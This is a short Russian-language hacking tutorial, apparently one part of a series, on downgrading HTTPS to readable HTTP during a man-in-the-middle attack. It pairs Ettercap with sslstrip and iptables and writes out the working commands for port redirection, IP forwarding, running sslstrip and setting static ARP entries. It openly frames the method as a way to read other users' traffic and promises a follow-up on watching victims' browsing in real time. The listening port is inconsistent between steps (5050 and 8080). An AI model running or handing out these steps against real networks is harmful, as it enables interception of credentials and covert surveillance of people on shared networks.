Как и было мною обещано сейчас я расскажу вам как подменить тип шифрования дабы Ettercap смог понять что он отобрал для нас и не выкинул эту инфу.
Как раз для этого мы используем в тондеме с Ettercap(И его модулем mitm) новую програмку Ssl_Strip и IPtables.
Ssl_Strip как и IPtables не имеют графического интерфейса и по этому обычные пользователи предпочитают их не замечать, но мы не обычные,уже…
Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 5050 порт :
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 5050
Ну а теперь врубаем SSLstrip sslstrip -l 5050
Включаем форвардинг ip-forwarding пакетов:
echo «1» > /proc/sys/net/ipv4/ip_forward
Запускаем SSLstrip на просушку заданного нами порта:
sslstrip -l 8080
Убедитесь что вы не запустили через этот порт и другие «программы для поиска уезвимостей своих интернет сетей»
Создаем статический маршрут.
Два варианта:
Первый Вариант
arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx
Второй вариант
Если первый не сработал то вот второй вариант:
netsh interface ipv4 add neighbors «Подключение по локальной сети» «192.168.1.1» «xx-x-xx-xx-xx-xx»
В следующей части я научу вас подсматривать за тем на какие сайты заходит пользователь в реальном времени